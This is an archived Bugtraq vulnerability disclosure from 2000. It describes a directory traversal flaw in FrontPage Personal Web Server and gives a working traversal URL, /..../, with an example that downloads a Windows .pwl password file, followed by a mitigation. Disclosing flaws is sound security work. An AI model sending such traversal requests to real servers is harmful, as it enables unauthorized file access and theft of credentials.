Bugtraq mailing list archives

Doubledot bug in FrontPage FrontPage Personal Web Server.

From: rijt () WISH NET (Jan van de Rijt)
Date: Wed, 16 Feb 2000 00:15:51 +0100


Description: Doubledot bug in FrontPage FrontPage Personal Web Server.
Compromise: Accessing drive trough browser.
Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions not tested.
Details:
When FrontPage-PWS runs a site on your c:\ drive your drive could be accessed by any user accessing your page, simply 
by requesting any file in any directory except the files in the FrontPage dir. specially /_vti_pvt/.

How to exploit this bug?
Simply adding /..../ in the URL addressbar.

<A HREF="http://www.target.com/..../<any_dir">http://www.target.com/..../<any_dir</A>>/<any_file>

so by requesting http://www.target.com/..../Windows/Admin.pwl the webserver let us download the .pwl file from the 
target.

Files and dirs. with the hidden attribute set are vulnerable.

Solution:
The best solution is installing FrontPage on a drive that doesn't contain Private information.

Greetings,

Jan van de Rijt aka The Warlock.

Current thread:

Doubledot bug in FrontPage FrontPage Personal Web Server. Jan van de Rijt (Feb 15)
- <Possible follow-ups>
- Re: Doubledot bug in FrontPage FrontPage Personal Web Server. GALES,SIMON (Non-A-ColSprings,ex1) (Feb 18)
  - Re: Doubledot bug in FrontPage FrontPage Personal Web Server. Jeff Dafoe (Feb 18)
- Re: Doubledot bug in FrontPage FrontPage Personal Web Server. Alexander Kiwerski (Feb 21)
- Re: Doubledot bug in FrontPage FrontPage Personal Web Server. KOJIMA Hajime (Feb 24)